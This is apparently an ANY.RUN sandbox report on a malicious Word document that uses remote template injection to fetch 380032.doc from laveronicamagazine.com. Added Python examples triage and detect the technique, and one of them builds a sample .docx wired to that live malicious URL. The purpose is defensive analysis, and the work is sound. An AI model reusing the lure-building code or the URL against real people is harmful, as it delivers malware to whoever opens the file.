Field | Value |
---|---|
File name | 380028.docx |
Full analysis | https://app.any.run/tasks/da3f881b-00e8-421b-a2e7-e411d72ee4ba |
Verdict | Malicious activity |
Analysis date | September 11, 2019, 11:30:36 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info | Microsoft Word 2007+ |
MD5 | DF4170914F564DF9C10D68645796BFA6 |
SHA1 | 8361F2CA247008B50B41F65B0A9C03882339C60D |
SHA256 | 7DC92CEB5C56C18C2C645C4FD39E0D4D3C53A27355D5E6EEF38228F80342CC5D |
SSDEEP | 192:R5C0EvCH76yMtWNKm0mqQTnhr5OwQT1Q3P55aTbFTB8GoA6akkWdmp:R5C5vCHmyMtiK4LOwQT1Q3DaNdQnmp |
Extension | Description | Match (%) |
---|---|---|
.docx | Word Microsoft Office Open XML Format document | 52.2 |
.zip | Open Packaging Conventions container | 38.8 |
.zip | ZIP compressed archive | 8.8 |
Property | Value |
---|---|
Creator | Microsoft |
ModifyDate | 2017:09:24 17:27:00Z |
CreateDate | 2017:09:24 17:26:00Z |
RevisionNumber | 1 |
LastModifiedBy | Microsoft |
AppVersion | 14 |
HyperlinksChanged | No |
SharedDoc | No |
CharactersWithSpaces | 7 |
LinksUpToDate | No |
Company | SPecialiST RePack |
TitlesOfParts | - |
HeadingPairs | |
ScaleCrop | No |
Paragraphs | 1 |
Lines | 1 |
DocSecurity | None |
Application | Microsoft Office Word |
Characters | 7 |
Words | 1 |
Pages | 1 |
TotalEditTime | 1 minute |
Template | dotm.dotm |
ZIP entry property | Value |
---|---|
ZipFileName | [Content_Types].xml |
ZipUncompressedSize | 1422 |
ZipCompressedSize | 358 |
ZipCRC | 0x82872409 |
ZipModifyDate | 2019:09:10 10:59:06 |
ZipCompression | Deflated |
ZipBitFlag | 0x0002 |
ZipRequiredVersion | 20 |
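The metadata above describes a one-word document whose Template is dotm.dotm rather than the default Normal.dotm, and the process and network tables that follow show WINWORD.EXE (PID 3512) requesting 380032.doc from laveronicamagazine.com. That combination is consistent with an attached template that lives on a web server: word/_rels/settings.xml.rels carries an attachedTemplate relationship with TargetMode="External" and a URL as Target, and Word dereferences it when the document is opened, with no macro in the document itself. The Python below is an added triage example, not part of the ANY.RUN report or its tooling. It builds a constructed minimal .docx with such a relationship (the test reuses the URL observed in this analysis), lists every external relationship in the package, and flags an attached template that points at an http(s) or UNC location while leaving a template attached by local file path alone.

```python
"""Triage a .docx for a remote (attached) template.

Added example, not part of the ANY.RUN report or its tooling. Word resolves the
attachedTemplate relationship in word/_rels/settings.xml.rels when the document
is opened; with TargetMode="External" and a URL as Target, WINWORD.EXE fetches
the template over the network with no macro in the document. The package built
by build_sample_docx() is constructed for this demo.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
ATTACHED_TEMPLATE = OFFICE_REL + "/attachedTemplate"

# Relationship types Word dereferences on its own when opening or rendering.
AUTO_FETCH = {
    ATTACHED_TEMPLATE: "attachedTemplate",
    OFFICE_REL + "/oleObject": "oleObject",
    OFFICE_REL + "/image": "image",
    OFFICE_REL + "/frame": "frame",
}
# http(s) URL or UNC path: either one makes Word go out to the network.
REMOTE_TARGET = re.compile(r"^(https?://|\\\\)", re.IGNORECASE)


def external_relationships(docx_bytes):
    """Return (part, label, target) for every relationship marked TargetMode="External"."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("TargetMode") != "External":
                    continue
                rtype = rel.get("Type", "")
                label = AUTO_FETCH.get(rtype, rtype.rsplit("/", 1)[-1])
                findings.append((part, label, rel.get("Target", "")))
    return findings


def is_remote_template_lure(docx_bytes):
    """True when the attached template sits on a web server or UNC share.

    A template attached by local path (file:///C:/.../Normal.dotm) is also
    TargetMode="External" but never leaves the host, so it is not flagged.
    """
    return any(
        label == "attachedTemplate" and REMOTE_TARGET.match(target) is not None
        for _, label, target in external_relationships(docx_bytes)
    )


def _rels_xml(*relationships):
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            f'<Relationships xmlns="{RELS_NS}">{"".join(relationships)}</Relationships>')


def build_sample_docx(template_target, external=True):
    """Constructed minimal .docx whose settings attach `template_target` (demo input only)."""
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    mode = ' TargetMode="External"' if external else ""
    parts = {
        "[Content_Types].xml": (
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
            '<Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/>'
            "</Types>"),
        "_rels/.rels": _rels_xml(
            f'<Relationship Id="rId1" Type="{OFFICE_REL}/officeDocument" Target="word/document.xml"/>'),
        "word/document.xml": (
            f'<w:document xmlns:w="{w_ns}"><w:body><w:p><w:r><w:t>placeholder</w:t></w:r></w:p>'
            "</w:body></w:document>"),
        "word/settings.xml": (
            f'<w:settings xmlns:w="{w_ns}" xmlns:r="{OFFICE_REL}"><w:attachedTemplate r:id="rId1"/></w:settings>'),
        "word/_rels/settings.xml.rels": _rels_xml(
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" Target="{template_target}"{mode}/>'),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("http://laveronicamagazine.com/wp-admin/network/jaku1/380032.doc")
    for part, label, target in external_relationships(sample):
        print(f"{part}: {label} -> {target}")
    print("remote template lure:", is_remote_template_lure(sample))
```

To triage a real file, pass `open(path, "rb").read()` to `external_relationships()` and review every row, not only the attached template: oleObject, image and frame relationships with an external target are fetched on render as well. The function deliberately distinguishes "External" from "remote", because legitimate documents routinely carry a file:/// path to the template they were created from.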
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3512 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\380028.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | | explorer.exe |

User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9E38.tmp.cvr | — | — | — |
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{3EEF5842-FF54-4544-804D-C615DB5B1E56} | — | — | — |
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{2575BAE7-EBB6-4987-B391-992F501D9F7A} | — | — | — |
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF | binary | 66F4CB4E409F7AA7BF084CB5486900B1 | E5D88426BEF2489AD787F6781CC468A768449875BA1DCDC456A0F620494DF634 |
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD | binary | E4D7CEE64D38347108E0FE7E923B9312 | 96DE4AA1084747A6B1C9A126CC874C5C0C9F98F9141D385481BEEFD0CADCEC5B |
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD | binary | 69824BDC5BDC5CD60EA1AEF0E3A787B4 | B0BCC0FB1BEAAE3DC0243BBFD538418E2AC0866F472EA9617D6955A30C7E5A35 |
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF | binary | D80A703296C4D19776ACB6B3D73C4516 | AE7147E600D636E38167044136CE22A915BA379D974368176260652B19C2C23A |
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{FB14BAFE-5382-4EC2-A782-D0F84E1E785A}.FSD | binary | C9EDCCDDA7EFADA758D6112364EBA680 | 6F7D4844618B45423A3B829CBE559C6EC103C5616A8446C79E4C36E72D1A7EF7 |
3512 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 62F2DA178DD59EBA6B61EE250E55F925 | 8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244 |
3512 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$380028.docx | pgc | 800EE39A958F7A28C2565157727F20F9 | 3B64B5ACFB348867B814954F5E58E39D962947B020194B5B845E7C2DF681505C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3512 | WINWORD.EXE | HEAD | 404 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1/380032.doc | US | — | — | malicious |
3512 | WINWORD.EXE | GET | — | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1/380032.doc | US | — | — | malicious |
984 | svchost.exe | OPTIONS | 200 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1/ | US | html | 1.02 Kb | malicious |
3512 | WINWORD.EXE | OPTIONS | 200 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1/ | US | html | 1.02 Kb | malicious |
3512 | WINWORD.EXE | HEAD | 404 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1/380032.doc | US | — | — | malicious |
984 | svchost.exe | PROPFIND | 200 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1/ | US | html | 1.02 Kb | malicious |
984 | svchost.exe | PROPFIND | 200 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1/ | US | html | 1.02 Kb | malicious |
984 | svchost.exe | PROPFIND | 301 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network | US | html | 705 b | malicious |
984 | svchost.exe | PROPFIND | 200 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1/ | US | html | 1.02 Kb | malicious |
984 | svchost.exe | PROPFIND | 301 | 23.227.137.210:80 | http://laveronicamagazine.com/wp-admin/network/jaku1 | US | html | 705 b | malicious |
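The requests above are the on-the-wire shape of a remote template fetch: WINWORD.EXE issues HEAD and GET for 380032.doc, and both Word and svchost.exe (the host process of the WebClient service) probe the directory with OPTIONS and PROPFIND, Office's WebDAV discovery for URL-opened content. The Python below is an added detection example, not ANY.RUN's own logic. It runs that correlation over constructed proxy-style records whose laveronicamagazine.com rows are copied from the table and whose remaining rows are benign noise added for contrast; it generalizes slightly beyond this sample by matching any Office host process and any Office document extension, and uses WebDAV traffic from svchost.exe to the same host as corroboration rather than as the trigger.

```python
"""Detect an Office process fetching a remote Office document, with WebDAV corroboration.

Added detection example, not from the ANY.RUN report. Input records are
(pid, process, method, status, url). The constructed EVENTS list copies the
laveronicamagazine.com rows from the report's HTTP table and adds benign noise.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

OFFICE_PROCS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Extensions an Office host will load as a document or template.
DOC_EXT = re.compile(r"\.(docx?|docm|dotx?|dotm|rtf|xlsx?|xlsm|xltm|pptx?|pptm|potm)$", re.I)
WEBDAV = {"OPTIONS", "PROPFIND"}

EVENTS = [
    # observed rows (report, PID 3512 = WINWORD.EXE, PID 984 = svchost.exe)
    (3512, "WINWORD.EXE", "HEAD", 404, "http://laveronicamagazine.com/wp-admin/network/jaku1/380032.doc"),
    (3512, "WINWORD.EXE", "GET", None, "http://laveronicamagazine.com/wp-admin/network/jaku1/380032.doc"),
    (984, "svchost.exe", "OPTIONS", 200, "http://laveronicamagazine.com/wp-admin/network/jaku1/"),
    (3512, "WINWORD.EXE", "OPTIONS", 200, "http://laveronicamagazine.com/wp-admin/network/jaku1/"),
    (984, "svchost.exe", "PROPFIND", 200, "http://laveronicamagazine.com/wp-admin/network/jaku1/"),
    (984, "svchost.exe", "PROPFIND", 301, "http://laveronicamagazine.com/wp-admin/network"),
    # constructed benign noise: a browser download, Word fetching non-document XML,
    # and WebDAV to a host Word never asked for a document from
    (2200, "chrome.exe", "GET", 200, "http://intranet.example/handbook.docx"),
    (3512, "WINWORD.EXE", "GET", 200, "http://intranet.example/autodiscover.xml"),
    (984, "svchost.exe", "PROPFIND", 207, "http://files.example/share/"),
]


def detect_remote_template_fetch(events):
    """Flag hosts where an Office process pulled a document-type URL over HTTP.

    WebDAV (OPTIONS/PROPFIND) from svchost.exe to the same host is Office's
    URL-open discovery traffic; when present it raises the severity to high.
    """
    per_host = defaultdict(lambda: {"office": [], "webdav": set()})
    for pid, proc, method, status, url in events:
        u = urlparse(url)
        if not u.hostname:
            continue
        proc = proc.lower()
        h = per_host[u.hostname]
        if proc in OFFICE_PROCS and method in ("HEAD", "GET") and DOC_EXT.search(u.path):
            h["office"].append((pid, method, status, url))
        if method in WEBDAV:
            h["webdav"].add(proc)

    findings = []
    for host, h in per_host.items():
        if not h["office"]:
            continue  # WebDAV alone (file shares, SharePoint) is not a finding
        corroborated = "svchost.exe" in h["webdav"]
        findings.append({
            "host": host,
            "pids": sorted({e[0] for e in h["office"]}),
            "urls": sorted({e[3] for e in h["office"]}),
            "webdav_fallback": corroborated,
            "severity": "high" if corroborated else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in detect_remote_template_fetch(EVENTS):
        print(finding)
```

Fed live proxy or Zeek http.log records with the process name joined in from endpoint telemetry, the same function produces one finding per host. Tune `DOC_EXT` to the document types your users legitimately open from URLs, and treat the 404 on the HEAD request as a hint that the hosting location had already been cleaned or rotated by the time of analysis, not as evidence that the fetch was harmless.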
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3512 | WINWORD.EXE | 23.227.137.210:80 | laveronicamagazine.com | 24 SHELLS | US | malicious |
984 | svchost.exe | 23.227.137.210:443 | laveronicamagazine.com | 24 SHELLS | US | malicious |
984 | svchost.exe | 23.227.137.210:80 | laveronicamagazine.com | 24 SHELLS | US | malicious |
Domain | IP | Reputation |
---|---|---|
laveronicamagazine.com | | malicious |